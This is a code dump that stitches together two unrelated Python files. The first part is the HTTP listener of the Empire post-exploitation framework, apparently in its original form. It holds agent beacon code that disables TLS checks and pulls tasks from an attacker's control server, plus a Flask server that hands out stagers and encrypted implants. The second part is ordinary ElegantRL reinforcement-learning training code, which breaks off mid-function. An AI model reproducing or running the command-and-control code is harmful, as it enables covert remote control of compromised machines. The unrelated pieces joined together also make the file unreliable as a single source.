def generate_comms(self, listenerOptions, language=None):
"""
Generate just the agent communication code block needed for communications with this listener.
This is so agents can easily be dynamically updated for the new listener.
"""
if language:
if language.lower() == 'powershell':
updateServers = """
$Script:ControlServers = @("%s");
$Script:ServerIndex = 0;
""" % (listenerOptions['Host']['Value'])
if listenerOptions['Host']['Value'].startswith('https'):
updateServers += "\n[System.Net.ServicePointManager]::ServerCertificateValidationCallback = {$true};"
getTask = """
function script:Get-Task {
try {
if ($Script:ControlServers[$Script:ServerIndex].StartsWith("http")) {
# meta 'TASKING_REQUEST' : 4
$RoutingPacket = New-RoutingPacket -EncData $Null -Meta 4
$RoutingCookie = [Convert]::ToBase64String($RoutingPacket)
# build the web request object
$wc = New-Object System.Net.WebClient
# set the proxy settings for the WC to be the default system settings
$wc.Proxy = [System.Net.WebRequest]::GetSystemWebProxy();
$wc.Proxy.Credentials = [System.Net.CredentialCache]::DefaultCredentials;
if($Script:Proxy) {
$wc.Proxy = $Script:Proxy;
}
$wc.Headers.Add("User-Agent",$script:UserAgent)
$script:Headers.GetEnumerator() | % {$wc.Headers.Add($_.Name, $_.Value)}
$wc.Headers.Add("Cookie", "session=$RoutingCookie")
# choose a random valid URI for checkin
$taskURI = $script:TaskURIs | Get-Random
$result = $wc.DownloadData($Script:ControlServers[$Script:ServerIndex] + $taskURI)
$result
}
}
catch [Net.WebException] {
$script:MissedCheckins += 1
if ($_.Exception.GetBaseException().Response.statuscode -eq 401) {
# restart key negotiation
Start-Negotiate -S "$ser" -SK $SK -UA $ua
}
}
}
"""
sendMessage = """
function script:Send-Message {
param($Packets)
if($Packets) {
# build and encrypt the response packet
$EncBytes = Encrypt-Bytes $Packets
# build the top level RC4 "routing packet"
# meta 'RESULT_POST' : 5
$RoutingPacket = New-RoutingPacket -EncData $EncBytes -Meta 5
if($Script:ControlServers[$Script:ServerIndex].StartsWith('http')) {
# build the web request object
$wc = New-Object System.Net.WebClient
# set the proxy settings for the WC to be the default system settings
$wc.Proxy = [System.Net.WebRequest]::GetSystemWebProxy();
$wc.Proxy.Credentials = [System.Net.CredentialCache]::DefaultCredentials;
if($Script:Proxy) {
$wc.Proxy = $Script:Proxy;
}
$wc.Headers.Add('User-Agent', $Script:UserAgent)
$Script:Headers.GetEnumerator() | ForEach-Object {$wc.Headers.Add($_.Name, $_.Value)}
try {
# get a random posting URI
$taskURI = $Script:TaskURIs | Get-Random
$response = $wc.UploadData($Script:ControlServers[$Script:ServerIndex]+$taskURI, 'POST', $RoutingPacket);
}
catch [System.Net.WebException]{
# exception posting data...
if ($_.Exception.GetBaseException().Response.statuscode -eq 401) {
# restart key negotiation
Start-Negotiate -S "$ser" -SK $SK -UA $ua
}
}
}
}
}
"""
return updateServers + getTask + sendMessage
elif language.lower() == 'python':
updateServers = "server = '%s'\n" % (listenerOptions['Host']['Value'])
if listenerOptions['Host']['Value'].startswith('https'):
updateServers += "hasattr(ssl, '_create_unverified_context') and ssl._create_unverified_context() or None"
sendMessage = """
def send_message(packets=None):
# Requests a tasking or posts data to a randomized tasking URI.
# If packets == None, the agent GETs a tasking from the control server.
# If packets != None, the agent encrypts the passed packets and
# POSTs the data to the control server.
global missedCheckins
global server
global headers
global taskURIs
data = None
if packets:
data = ''.join(packets)
# aes_encrypt_then_hmac is in stager.py
encData = aes_encrypt_then_hmac(key, data)
data = build_routing_packet(stagingKey, sessionID, meta=5, encData=encData)
else:
# if we're GETing taskings, then build the routing packet to stuff info a cookie first.
# meta TASKING_REQUEST = 4
routingPacket = build_routing_packet(stagingKey, sessionID, meta=4)
b64routingPacket = base64.b64encode(routingPacket)
headers['Cookie'] = "session=%s" % (b64routingPacket)
taskURI = random.sample(taskURIs, 1)[0]
requestUri = server + taskURI
try:
data = (urllib2.urlopen(urllib2.Request(requestUri, data, headers))).read()
return ('200', data)
except urllib2.HTTPError as HTTPError:
# if the server is reached, but returns an erro (like 404)
missedCheckins = missedCheckins + 1
#if signaled for restaging, exit.
if HTTPError.code == 401:
sys.exit(0)
return (HTTPError.code, '')
except urllib2.URLError as URLerror:
# if the server cannot be reached
missedCheckins = missedCheckins + 1
return (URLerror.reason, '')
return ('', '')
"""
return updateServers + sendMessage
else:
print helpers.color("[!] listeners/http generate_comms(): invalid language specification, only 'powershell' and 'python' are currently supported for this module.")
else:
print helpers.color('[!] listeners/http generate_comms(): no language specified!')
def start_server(self, listenerOptions):
"""
Threaded function that actually starts up the Flask server.
"""
# make a copy of the currently set listener options for later stager/agent generation
listenerOptions = copy.deepcopy(listenerOptions)
# suppress the normal Flask output
log = logging.getLogger('werkzeug')
log.setLevel(logging.ERROR)
bindIP = listenerOptions['BindIP']['Value']
host = listenerOptions['Host']['Value']
port = listenerOptions['Port']['Value']
stagingKey = listenerOptions['StagingKey']['Value']
stagerURI = listenerOptions['StagerURI']['Value']
userAgent = self.options['UserAgent']['Value']
listenerName = self.options['Name']['Value']
proxy = self.options['Proxy']['Value']
proxyCreds = self.options['ProxyCreds']['Value']
app = Flask(__name__)
self.app = app
@app.route('/download/<stager>')
def send_stager(stager):
if stager:
launcher = self.mainMenu.stagers.generate_launcher(listenerName, language='powershell', encode=False, userAgent=userAgent, proxy=proxy, proxyCreds=proxyCreds)
return launcher
else:
pass
@app.before_request
def check_ip():
"""
Before every request, check if the IP address is allowed.
"""
if not self.mainMenu.agents.is_ip_allowed(request.remote_addr):
dispatcher.send("[!] %s on the blacklist/not on the whitelist requested resource" % (request.remote_addr), sender="listeners/http")
return make_response(self.default_response(), 200)
@app.after_request
def change_header(response):
"Modify the default server version in the response."
response.headers['Server'] = listenerOptions['ServerVersion']['Value']
return response
@app.after_request
def add_proxy_headers(response):
"Add HTTP headers to avoid proxy caching."
response.headers['Cache-Control'] = "no-cache, no-store, must-revalidate"
response.headers['Pragma'] = "no-cache"
response.headers['Expires'] = "0"
return response
@app.route('/<path:request_uri>', methods=['GET'])
def handle_get(request_uri):
"""
Handle an agent GET request.
This is used during the first step of the staging process,
and when the agent requests taskings.
"""
clientIP = request.remote_addr
dispatcher.send("[*] GET request for %s/%s from %s" % (request.host, request_uri, clientIP), sender='listeners/http')
routingPacket = None
cookie = request.headers.get('Cookie')
if cookie and cookie != '':
try:
# see if we can extract the 'routing packet' from the specified cookie location
# NOTE: this can be easily moved to a paramter, another cookie value, etc.
if 'session' in cookie:
dispatcher.send("[*] GET cookie value from %s : %s" % (clientIP, cookie), sender='listeners/http')
cookieParts = cookie.split(';')
for part in cookieParts:
if part.startswith('session'):
base64RoutingPacket = part[part.find('=')+1:]
# decode the routing packet base64 value in the cookie
routingPacket = base64.b64decode(base64RoutingPacket)
except Exception as e:
routingPacket = None
pass
if routingPacket:
# parse the routing packet and process the results
dataResults = self.mainMenu.agents.handle_agent_data(stagingKey, routingPacket, listenerOptions, clientIP)
if dataResults and len(dataResults) > 0:
for (language, results) in dataResults:
if results:
if results == 'STAGE0':
# handle_agent_data() signals that the listener should return the stager.ps1 code
# step 2 of negotiation -> return stager.ps1 (stage 1)
dispatcher.send("[*] Sending %s stager (stage 1) to %s" % (language, clientIP), sender='listeners/http')
stage = self.generate_stager(language=language, listenerOptions=listenerOptions, obfuscate=self.mainMenu.obfuscate, obfuscationCommand=self.mainMenu.obfuscateCommand)
return make_response(stage, 200)
elif results.startswith('ERROR:'):
dispatcher.send("[!] Error from agents.handle_agent_data() for %s from %s: %s" % (request_uri, clientIP, results), sender='listeners/http')
if 'not in cache' in results:
# signal the client to restage
print helpers.color("[*] Orphaned agent from %s, signaling restaging" % (clientIP))
return make_response(self.default_response(), 401)
else:
return make_response(self.default_response(), 200)
else:
# actual taskings
dispatcher.send("[*] Agent from %s retrieved taskings" % (clientIP), sender='listeners/http')
return make_response(results, 200)
else:
# dispatcher.send("[!] Results are None...", sender='listeners/http')
return make_response(self.default_response(), 200)
else:
return make_response(self.default_response(), 200)
else:
dispatcher.send("[!] %s requested by %s with no routing packet." % (request_uri, clientIP), sender='listeners/http')
return make_response(self.default_response(), 200)
@app.route('/<path:request_uri>', methods=['POST'])
def handle_post(request_uri):
"""
Handle an agent POST request.
"""
stagingKey = listenerOptions['StagingKey']['Value']
clientIP = request.remote_addr
requestData = request.get_data()
dispatcher.send("[*] POST request data length from %s : %s" % (clientIP, len(requestData)), sender='listeners/http')
# the routing packet should be at the front of the binary request.data
# NOTE: this can also go into a cookie/etc.
dataResults = self.mainMenu.agents.handle_agent_data(stagingKey, requestData, listenerOptions, clientIP)
if dataResults and len(dataResults) > 0:
for (language, results) in dataResults:
if results:
if results.startswith('STAGE2'):
# TODO: document the exact results structure returned
if ':' in clientIP:
clientIP = '[' + str(clientIP) + ']'
sessionID = results.split(' ')[1].strip()
sessionKey = self.mainMenu.agents.agents[sessionID]['sessionKey']
dispatcher.send("[*] Sending agent (stage 2) to %s at %s" % (sessionID, clientIP), sender='listeners/http')
hopListenerName = request.headers.get('Hop-Name')
try:
hopListener = helpers.get_listener_options(hopListenerName)
tempListenerOptions = copy.deepcopy(listenerOptions)
tempListenerOptions['Host']['Value'] = hopListener['Host']['Value']
except TypeError:
tempListenerOptions = listenerOptions
# step 6 of negotiation -> server sends patched agent.ps1/agent.py
agentCode = self.generate_agent(language=language, listenerOptions=tempListenerOptions, obfuscate=self.mainMenu.obfuscate, obfuscationCommand=self.mainMenu.obfuscateCommand)
encryptedAgent = encryption.aes_encrypt_then_hmac(sessionKey, agentCode)
# TODO: wrap ^ in a routing packet?
return make_response(encryptedAgent, 200)
elif results[:10].lower().startswith('error') or results[:10].lower().startswith('exception'):
dispatcher.send("[!] Error returned for results by %s : %s" %(clientIP, results), sender='listeners/http')
return make_response(self.default_response(), 200)
elif results == 'VALID':
dispatcher.send("[*] Valid results return by %s" % (clientIP), sender='listeners/http')
return make_response(self.default_response(), 200)
else:
return make_response(results, 200)
else:
return make_response(self.default_response(), 200)
else:
return make_response(self.default_response(), 200)
try:
certPath = listenerOptions['CertPath']['Value']
host = listenerOptions['Host']['Value']
if certPath.strip() != '' and host.startswith('https'):
certPath = os.path.abspath(certPath)
pyversion = sys.version_info
# support any version of tls
if pyversion[0] == 2 and pyversion[1] == 7 and pyversion[2] >= 13:
proto = ssl.PROTOCOL_TLS
elif pyversion[0] >= 3:
proto = ssl.PROTOCOL_TLS
else:
proto = ssl.PROTOCOL_SSLv23
context = ssl.SSLContext(proto)
context.load_cert_chain("%s/empire-chain.pem" % (certPath), "%s/empire-priv.key" % (certPath))
app.run(host=bindIP, port=int(port), threaded=True, ssl_context=context)
else:
app.run(host=bindIP, port=int(port), threaded=True)
except Exception as e:
print helpers.color("[!] Listener startup on port %s failed: %s " % (port, e))
dispatcher.send("[!] Listener startup on port %s failed: %s " % (port, e), sender='listeners/http')
def start(self, name=''):
"""
Start a threaded instance of self.start_server() and store it in the
self.threads dictionary keyed by the listener name.
"""
listenerOptions = self.options
if name and name != '':
self.threads[name] = helpers.KThread(target=self.start_server, args=(listenerOptions,))
self.threads[name].start()
time.sleep(1)
# returns True if the listener successfully started, false otherwise
return self.threads[name].is_alive()
else:
name = listenerOptions['Name']['Value']
self.threads[name] = helpers.KThread(target=self.start_server, args=(listenerOptions,))
self.threads[name].start()
time.sleep(1)
# returns True if the listener successfully started, false otherwise
return self.threads[name].is_alive()
def shutdown(self, name=''):
"""
Terminates the server thread stored in the self.threads dictionary,
keyed by the listener name.
"""
if name and name != '':
print helpers.color("[!] Killing listener '%s'" % (name))
self.threads[name].kill()
else:
print helpers.color("[!] Killing listener '%s'" % (self.options['Name']['Value']))
self.threads[self.options['Name']['Value']].kill()
|
run.py
|
import os
import sys
import time
import torch
import numpy as np
import numpy.random as rd
import multiprocessing as mp
from elegantrl.env import build_env, build_eval_env
from elegantrl.replay import ReplayBuffer, ReplayBufferMP
from elegantrl.evaluator import Evaluator
"""[ElegantRL.2021.10.21](https://github.com/AI4Finance-Foundation/ElegantRL)"""
class Arguments: # [ElegantRL.2021.10.21]
def __init__(self, env, agent):
self.env = env # the environment for training
self.env_num = getattr(env, 'env_num', 1) # env_num = 1. In vector env, env_num > 1.
self.max_step = getattr(env, 'max_step', None) # the max step of an episode
self.state_dim = getattr(env, 'state_dim', None) # vector dimension (feature number) of state
self.action_dim = getattr(env, 'action_dim', None) # vector dimension (feature number) of action
self.if_discrete = getattr(env, 'if_discrete', None) # discrete or continuous action space
self.target_return = getattr(env, 'target_return', None) # target average episode return
self.agent = agent # Deep Reinforcement Learning algorithm
self.if_off_policy = agent.if_off_policy # agent is on-policy or off-policy
if self.if_off_policy: # off-policy
self.net_dim = 2 ** 8 # the network width
self.max_memo = 2 ** 21 # capacity of replay buffer
self.batch_size = self.net_dim # num of transitions sampled from replay buffer.
self.target_step = 2 ** 10 # repeatedly update network to keep critic's loss small
self.repeat_times = 2 ** 0 # collect target_step, then update network
self.if_per_or_gae = False # use PER (Prioritized Experience Replay) for sparse reward
else: # on-policy
self.net_dim = 2 ** 9 # the network width
self.max_memo = 2 ** 12 # capacity of replay buffer
self.batch_size = self.net_dim * 2 # num of transitions sampled from replay buffer.
self.target_step = self.max_memo # repeatedly update network to keep critic's loss small
self.repeat_times = 2 ** 3 # collect target_step, then update network
self.if_per_or_gae = False # use PER: GAE (Generalized Advantage Estimation) for sparse reward
'''Arguments for training'''
self.gamma = 0.99 # discount factor of future rewards
self.reward_scale = 2 ** 0 # an approximate target reward usually be closed to 256
self.learning_rate = 2 ** -15 # 2 ** -14 ~= 3e-5
self.soft_update_tau = 2 ** -8 # 2 ** -8 ~= 5e-3
'''Arguments for device'''
self.worker_num = 2 # rollout workers number pre GPU (adjust it to get high GPU usage)
self.thread_num = 8 # cpu_num for evaluate model, torch.set_num_threads(self.num_threads)
self.random_seed = 0 # initialize random seed in self.init_before_training()
self.learner_gpus = (0,) # for example: os.environ['CUDA_VISIBLE_DEVICES'] = '0, 2,'
self.workers_gpus = self.learner_gpus # for GPU_VectorEnv (such as isaac gym)
'''Arguments for evaluate and save'''
self.cwd = None # the directory path to save the model
self.if_remove = True # remove the cwd folder? (True, False, None:ask me)
self.break_step = +np.inf # break training after 'total_step > break_step'
self.if_allow_break = True # allow break training when reach goal (early termination)
self.eval_env = None # the environment for evaluating. None means set automatically.
self.eval_gap = 2 ** 8 # evaluate the agent per eval_gap seconds
self.eval_times1 = 2 ** 2 # number of times that get episode return in first
self.eval_times2 = 2 ** 4 # number of times that get episode return in second
self.eval_gpu_id = None # -1 means use cpu, >=0 means use GPU, None means set as learner_gpus[0]
self.if_overwrite = False # Save policy networks with different episode return or overwrite
def init_before_training(self):
np.random.seed(self.random_seed)
torch.manual_seed(self.random_seed)
torch.set_num_threads(self.thread_num)
torch.set_default_dtype(torch.float32)
'''env'''
assert isinstance(self.env_num, int)
assert isinstance(self.max_step, int)
assert isinstance(self.state_dim, int) or isinstance(self.state_dim, tuple)
assert isinstance(self.action_dim, int)
assert isinstance(self.if_discrete, bool)
assert isinstance(self.target_return, int) or isinstance(self.target_return, float)
'''agent'''
assert hasattr(self.agent, 'init')
assert hasattr(self.agent, 'update_net')
assert hasattr(self.agent, 'explore_env')
assert hasattr(self.agent, 'select_actions')
'''auto set'''
if self.cwd is None:
agent_name = self.agent.__class__.__name__
env_name = getattr(self.env, 'env_name', self.env)
self.cwd = f'./{agent_name}_{env_name}_{self.learner_gpus}'
if self.eval_gpu_id is None:
self.eval_gpu_id = self.learner_gpus[0]
'''remove history'''
if self.if_remove is None:
self.if_remove = bool(input(f"| PRESS 'y' to REMOVE: {self.cwd}? ") == 'y')
elif self.if_remove:
import shutil
shutil.rmtree(self.cwd, ignore_errors=True)
print(f"| Remove cwd: {self.cwd}")
else:
print(f"| Keep cwd: {self.cwd}")
os.makedirs(self.cwd, exist_ok=True)
'''single processing training'''
def train_and_evaluate(args, learner_id=0):
args.init_before_training() # necessary!
'''init: Agent'''
agent = args.agent
agent.init(net_dim=args.net_dim, gpu_id=args.learner_gpus[learner_id],
state_dim=args.state_dim, action_dim=args.action_dim, env_num=args.env_num,
learning_rate=args.learning_rate, if_per_or_gae=args.if_per_or_gae)
agent.save_or_load_agent(args.cwd, if_save=False)
env = build_env(env=args.env, if_print=False, device_id=args.eval_gpu_id, env_num=args.env_num)
if env.env_num == 1:
agent.states = [env.reset(), ]
assert isinstance(agent.states[0], np.ndarray)
assert agent.states[0].shape == (env.state_dim,)
else:
agent.states = env.reset()
assert isinstance(agent.states, torch.Tensor)
assert agent.states.shape == (env.env_num, env.state_dim)
'''init Evaluator'''
eval_env = build_eval_env(args.eval_env, args.env, args.eval_gpu_id, args.env_num)
evaluator = Evaluator(cwd=args.cwd, agent_id=0,
eval_env=eval_env, eval_gap=args.eval_gap,
eval_times1=args.eval_times1, eval_times2=args.eval_times2,
target_return=args.target_return, if_overwrite=args.if_overwrite)
evaluator.save_or_load_recoder(if_save=False)
'''init ReplayBuffer'''
if args.if_off_policy:
buffer = ReplayBuffer(max_len=args.max_memo, state_dim=env.state_dim,
action_dim=1 if env.if_discrete else env.action_dim,
if_use_per=args.if_per_or_gae, gpu_id=args.learner_gpus[learner_id])
buffer.save_or_load_history(args.cwd, if_save=False)
def update_buffer(_traj_list):
ten_state, ten_other = _traj_list[0]
buffer.extend_buffer(ten_state, ten_other)
_steps, _r_exp = get_step_r_exp(ten_reward=ten_other[0]) # other = (reward, mask, action)
return _steps, _r_exp
else:
buffer = list()
def update_buffer(_traj_list):
(ten_state, ten_reward, ten_mask, ten_action, ten_noise) = _traj_list[0]
buffer[:] = (ten_state.squeeze(1),
ten_reward,
ten_mask,
ten_action.squeeze(1),
ten_noise.squeeze(1))
_step, _r_exp = get_step_r_exp(ten_reward=buffer[1])
return _step, _r_exp
"""start training"""
cwd = args.cwd
gamma = args.gamma
break_step = args.break_step
batch_size = args.batch_size
target_step = args.target_step
repeat_times = args.repeat_times
reward_scale = args.reward_scale
if_allow_break = args.if_allow_break
soft_update_tau = args.soft_update_tau
del args
'''init ReplayBuffer after training start'''
if agent.if_off_policy:
if_load = buffer.save_or_load_history(cwd, if_save=False)
if not if_load:
traj_list = agent.explore_env(env, target_step, reward_scale, gamma)
steps, r_exp = update_buffer(traj_list)
evaluator.total_step += steps
'''start training loop'''
if_train = True
while if_train:
with torch.no_grad():
traj_list = agent.explore_env(env, target_step, reward_scale, gamma)
steps, r_exp = update_buffer(traj_list)
logging_tuple = agent.update_net(buffer, batch_size, repeat_times, soft_update_tau)
with torch.no_grad():
temp = evaluator.evaluate_and_save(agent.act, steps, r_exp, logging_tuple)
if_reach_goal, if_save = temp
if_train = not ((if_allow_break and if_reach_goal)
or evaluator.total_step > break_step
or os.path.exists(f'{cwd}/stop'))
print(f'| UsedTime: {time.time() - evaluator.start_time:>7.0f} | SavedDir: {cwd}')
agent.save_or_load_agent(cwd, if_save=True)
buffer.save_or_load_history(cwd, if_save=True) if agent.if_off_policy else None
evaluator.save_or_load_recoder(if_save=True)
def get_step_r_exp(ten_reward):
return len(ten_reward), ten_reward.mean().item()
'''multiple processing training'''
def train_and_evaluate_mp(args, agent_id=0):
args.init_before_training() # necessary!
process = list()
mp.set_start_method(method='spawn', force=True) # force all the multiprocessing to 'spawn' methods
'''learner'''
learner_num = len(args.learner_gpus)
learner_pipe = PipeLearner(learner_num)
for learner_id in range(learner_num):
'''evaluator'''
if learner_id == learner_num - 1:
evaluator_pipe = PipeEvaluator()
process.append(mp.Process(target=evaluator_pipe.run, args=(args, agent_id)))
else:
evaluator_pipe = None
'''explorer'''
worker_pipe = PipeWorker(args.env_num, args.worker_num)
for worker_id in range(args.worker_num):
# if args.env_num == 1:
# env_pipe = None
# else:
# env_pipe = PipeVectorEnv(args)
# process.extend(env_pipe.process)
env_pipe = None
process.append(mp.Process(target=worker_pipe.run, args=(args, env_pipe, worker_id, learner_id)))
process.append(mp.Process(target=learner_pipe.run, args=(args, evaluator_pipe, worker_pipe, learner_id)))
[(p.start(), time.sleep(0.1)) for p in process]
process[-1].join()
process_safely_terminate(process)
class PipeWorker:
def __init__(self, env_num, worker_num):
self.env_num = env_num
self.worker_num = worker_num
self.pipes = [mp.Pipe() for _ in range(worker_num)]
self.pipe1s = [pipe[1] for pipe in self.pipes]
def explore0(self, agent):
act_dict = agent.act.state_dict()
for worker_id in range(self.worker_num):
self.pipe1s[worker_id].send(act_dict)
traj_lists = [pipe1.recv() for pipe1 in self.pipe1s]
return traj_lists
def explore(self, agent):
act_dict = agent.act.state_dict()
if sys.platform == 'win32': # todo: not elegant. YonV1943. Avoid CUDA runtime error (801)
# Python3.9< multiprocessing can't send torch.tensor_gpu in WinOS. So I send torch.tensor_cpu
for key, value in act_dict.items():
act_dict[key] = value.to(torch.device('cpu'))
for worker_id in range(self.worker_num):
self.pipe1s[worker_id].send(act_dict)
traj_lists = [pipe1.recv() for pipe1 in self.pipe1s]
return traj_lists
def run(self, args, _comm_env, worker_id, learner_id): # not elegant: comm_env
# print(f'| os.getpid()={os.getpid()} PipeExplore.run {learner_id}')
env = build_env(env=args.env, if_print=False, device_id=args.workers_gpus[learner_id], env_num=args.env_num)
'''init Agent'''
agent = args.agent
agent.init(net_dim=args.net_dim, gpu_id=args.learner_gpus[learner_id],
state_dim=args.state_dim, action_dim=args.action_dim, env_num=args.env_num,
learning_rate=args.learning_rate, if_per_or_gae=args.if_per_or_gae)
if args.env_num == 1:
agent.states = [env.reset(), ]
else:
agent.states = env.reset() # VecEnv
'''loop'''
gamma = args.gamma
target_step = args.target_step
reward_scale = args.reward_scale
del args
with torch.no_grad():
while True:
act_dict = self.pipes[worker_id][0].recv()
if sys.platform == 'win32': # todo: not elegant. YonV1943. Avoid CUDA runtime error (801)
# Python3.9< multiprocessing can't send torch.tensor_gpu in WinOS. So I send torch.tensor_cpu
for key, value in act_dict.items():
act_dict[key] = value.to(agent.device)
agent.act.load_state_dict(act_dict)
trajectory = agent.explore_env(env, target_step, reward_scale, gamma)
if sys.platform == 'win32': # todo: not elegant. YonV1943. Avoid CUDA runtime error (801)
# Python3.9< multiprocessing can't send torch.tensor_gpu in WinOS. So I send torch.tensor_cpu
trajectory = [[item.to(torch.device('cpu'))
for item in item_list]
for item_list in trajectory]
self.pipes[worker_id][0].send(trajectory)
class PipeLearner:
def __init__(self, learner_num):
self.learner_num = learner_num
self.round_num = int(np.log2(learner_num))
self.pipes = [mp.Pipe() for _ in range(learner_num)]
pipes = [mp.Pipe() for _ in range(learner_num)]
self.pipe0s = [pipe[0] for pipe in pipes]
self.pipe1s = [pipe[1] for pipe in pipes]
self.device_list = [torch.device(f'cuda:{i}') for i in range(learner_num)]
if learner_num == 1:
self.idx_l = None
elif learner_num == 2:
self.idx_l = [(1,), (0,), ]
elif learner_num == 4:
self.idx_l = [(1, 2), (0, 3),
(3, 0), (2, 1), ]
elif learner_num == 8:
self.idx_l = [(1, 2, 4), (0, 3, 5),
(3, 0, 6), (2, 1, 7),
(5, 6, 0), (4, 7, 1),
(7, 4, 2), (6, 5, 3), ]
else:
print(f"| LearnerPipe, ERROR: learner_num {learner_num} should in (1, 2, 4, 8)")
exit()
def comm_data(self, data, learner_id, round_id):
if round_id == -1:
learner_jd = self.idx_l[learner_id][round_id]
self.pipes[learner_jd][0].send(data)
return self.pipes[learner_id][1].recv()
else:
learner_jd = self.idx_l[learner_id][round_id]
self.pipe0s[learner_jd].send(data)
return self.pipe1s[learner_id].recv()
def comm_network_optim(self, agent, learner_id):
device = self.device_list[learner_id]
for round_id in range(self.round_num):
data = get_comm_data(agent)
data = self.comm_data(data, learner_id, round_id)
if data:
avg_update_net(agent.act, data[0], device)
avg_update_optim(agent.act_optim, data[1], device) if data[1] else None
avg_update_net(agent.cri, data[2], device) if data[2] else None
avg_update_optim(agent.cri_optim, data[3], device)
avg_update_net(agent.act_target, data[4], device) if agent.if_use_act_target else None
avg_update_net(agent.cri_target, data[5], device) if agent.if_use_cri_target else None
def run0(self, args, comm_eva, comm_exp, learner_id=0):
# print(f'| os.getpid()={os.getpid()} PipeLearn.run, {learner_id}')
pass
'''init Agent'''
agent = args.agent
agent.init(net_dim=args.net_dim, gpu_id=args.learner_gpus[learner_id],
state_dim=args.state_dim, action_dim=args.action_dim, env_num=args.env_num,
learning_rate=args.learning_rate, if_per_or_gae=args.if_per_or_gae)
agent.save_or_load_agent(args.cwd, if_save=False)
'''init ReplayBuffer'''
if agent.if_off_policy:
buffer_num = args.worker_num * args.env_num
if self.learner_num > 1:
buffer_num *= 2
buffer = ReplayBufferMP(max_len=args.max_memo, state_dim=args.state_dim,
action_dim=1 if args.if_discrete else args.action_dim,
if_use_per=args.if_per_or_gae,
buffer_num=buffer_num, gpu_id=args.learner_gpus[learner_id])
buffer.save_or_load_history(args.cwd, if_save=False)
def update_buffer(_traj_list):
step_sum = 0
r_exp_sum = 0
for buffer_i, (ten_state, ten_other) in enumerate(_traj_list):
buffer.buffers[buffer_i].extend_buffer(ten_state, ten_other)
step_r_exp = get_step_r_exp(ten_reward=ten_other[:, 0]) # other = (reward, mask, action)
step_sum += step_r_exp[0]
r_exp_sum += step_r_exp[1]
return step_sum, r_exp_sum / len(_traj_list)
else:
buffer = list()
def update_buffer(_traj_list):
_traj_list = list(map(list, zip(*_traj_list)))
_traj_list = [torch.cat(t, dim=0) for t in _traj_list]
(ten_state, ten_reward, ten_mask, ten_action, ten_noise) = _traj_list
buffer[:] = (ten_state.squeeze(1),
ten_reward,
ten_mask,
ten_action.squeeze(1),
ten_noise.squeeze(1))
_step, _r_exp = get_step_r_exp(ten_reward=buffer[1])
return _step, _r_exp
'''start training'''
cwd = args.cwd
batch_size = args.batch_size
repeat_times = args.repeat_times
soft_update_tau = args.soft_update_tau
del args
if_train = True
while if_train:
traj_lists = comm_exp.explore(agent)
if self.learner_num > 1:
data = self.comm_data(traj_lists, learner_id, round_id=-1)
traj_lists.extend(data)
traj_list = sum(traj_lists, list())
steps, r_exp = update_buffer(traj_list)
del traj_lists
logging_tuple = agent.update_net(buffer, batch_size, repeat_times, soft_update_tau)
if self.learner_num > 1:
self.comm_network_optim(agent, learner_id)
if comm_eva:
if_train, if_save = comm_eva.evaluate_and_save_mp(agent.act, steps, r_exp, logging_tuple)
agent.save_or_load_agent(cwd, if_save=True)
if agent.if_off_policy:
print(f"| LearnerPipe.run: ReplayBuffer saving in {cwd}")
buffer.save_or_load_history(cwd, if_save=True)
def run(self, args, comm_eva, comm_exp, learner_id=0):
# print(f'| os.getpid()={os.getpid()} PipeLearn.run, {learner_id}')
pass
'''init Agent'''
agent = args.agent
agent.init(net_dim=args.net_dim, gpu_id=args.learner_gpus[learner_id],
state_dim=args.state_dim, action_dim=args.action_dim, env_num=args.env_num,
learning_rate=args.learning_rate, if_per_or_gae=args.if_per_or_gae)
agent.save_or_load_agent(args.cwd, if_save=False)
'''init ReplayBuffer'''
if agent.if_off_policy:
buffer_num = args.worker_num * args.env_num
if self.learner_num > 1:
buffer_num *= 2
buffer = ReplayBufferMP(max_len=args.max_memo, state_dim=args.state_dim,
action_dim=1 if args.if_discrete else args.action_dim,
if_use_per=args.if_per_or_gae,
buffer_num=buffer_num, gpu_id=args.learner_gpus[learner_id])
buffer.save_or_load_history(args.cwd, if_save=False)
def update_buffer(_traj_list):
step_sum = 0
r_exp_sum = 0
for buffer_i, (ten_state, ten_other) in enumerate(_traj_list):
buffer.buffers[buffer_i].extend_buffer(ten_state, ten_other)
step_r_exp = get_step_r_exp(ten_reward=ten_other[:, 0]) # other = (reward, mask, action)
step_sum += step_r_exp[0]
r_exp_sum += step_r_exp[1]
return step_sum, r_exp_sum / len(_traj_list)
else:
buffer = list()
def update_buffer(_traj_list):
_traj_list = list(map(list, zip(*_traj_list)))
_traj_list = [torch.cat(t, dim=0) for t in _traj_list]
(ten_state, ten_reward, ten_mask, ten_action, ten_noise) = _traj_list
buffer[:] = (ten_state.squeeze(1),
ten_reward,
ten_mask,
ten_action.squeeze(1),
ten_noise.squeeze(1))
_step, _r_exp = get_step_r_exp(ten_reward=buffer[1])
return _step, _r_exp
'''start training'''
cwd = args.cwd
batch_size = args.batch_size
repeat_times = args.repeat_times
soft_update_tau = args.soft_update_tau
del args
if_train = True
while if_train:
traj_lists = comm_exp.explore(agent)
if self.learner_num > 1:
data = self.comm_data(traj_lists, learner_id, round_id=-1)
traj_lists.extend(data)
traj_list = sum(traj_lists, list())
if sys.platform == 'win32': # todo: not elegant. YonV1943. Avoid CUDA runtime error (801)
# Python3.9< multiprocessing can't send torch.tensor_gpu in WinOS. So I send torch.tensor_cpu
traj_list = [[item.to(torch.device('cpu'))
for item in item_list]
for item_list in traj_list]
steps, r_exp = update_buffer(traj_list)
del traj_lists
logging_tuple = agent.update_net(buffer, batch_size, repeat_times, soft_update_tau)
if self.learner_num > 1:
self.comm_network_optim(agent, learner_id)
if comm_eva:
if_train, if_save = comm_eva.evaluate_and_save_mp(agent.act, steps, r_exp, logging_tuple)
agent.save_or_load_agent(cwd, if_save=True)
if agent.if_off_policy:
print(f"| LearnerPipe.run: ReplayBuffer saving in {cwd}")
buffer.save_or_load_history(cwd, if_save=True)
class PipeEvaluator: # [ElegantRL.10.21]
def __init__(self):
super().__init__()
self.pipe0, self.pipe1 = mp.Pipe()
def evaluate_and_save_mp(self, agent_act, steps, r_exp, logging_tuple):
if self.pipe1.poll(): # if_evaluator_idle
if_train, if_save = self.pipe1.recv()
act_cpu_dict = {k: v.cpu() for k, v in agent_act.state_dict().items()}
else:
if_train, if_save = True, False
act_cpu_dict = None
self.pipe1.send((act_cpu_dict, steps, r_exp, logging_tuple))
return if_train, if_save
def run(self, args, _learner_id):
# print(f'| os.getpid()={os.getpid()} PipeEvaluate.run {agent_id}')
pass
'''init: Agent'''
agent = args.agent
agent.init(net_dim=args.net_dim, gpu_id=args.eval_gpu_id,
